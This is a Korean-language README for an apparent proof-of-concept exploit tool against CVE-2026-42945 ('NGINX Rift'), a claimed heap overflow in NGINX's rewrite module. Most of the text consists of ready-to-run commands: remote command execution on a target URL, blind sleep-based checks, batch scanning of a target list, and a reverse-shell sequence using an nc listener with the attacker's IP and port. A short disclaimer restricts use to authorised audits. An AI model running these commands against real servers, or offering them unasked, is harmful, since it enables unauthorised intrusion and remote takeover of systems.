
CVE-2026-42945(NGINX Rift)에 대한 개념 증명 익스플로잇으로, 다중 모드 RCE, 블라인드 검증, 리버스 셸, 그리고 승인된 보안 연구를 위한 배치 스캐닝 기능을 제공합니다.
NGINX Rift 취약점(ngx_http_rewrite_module의 치명적인 힙 기반 버퍼 오버플로)을 연구하고 식별하기 위한 전문 PoC(Proof-of-Concept) 도구입니다.
python3 poc.py --url http://target.com --method id
targets.txt 파일을 만들고 한 줄에 URL 하나씩 입력합니다:
http://1.2.3.4
https://docs.company.com
http://server.internal:8080
그런 다음 실행합니다:
python3 poc.py --list targets.txt --method sleep
python3 poc.py --url http://target.com --cmd "whoami" --verbose
먼저 리스너를 실행합니다: nc -lvp 1337
python3 poc.py --url http://target.com --method shell --listen-ip [YOUR_IP] --listen-port 1337
이 도구는 교육 목적 및 승인된 보안 감사에만 사용해야 합니다. 저자는 이 스크립트로 인한 오용이나 손해에 대해 책임을 지지 않습니다. 인프라를 테스트하기 전에 항상 명시적인 허가를 받으십시오.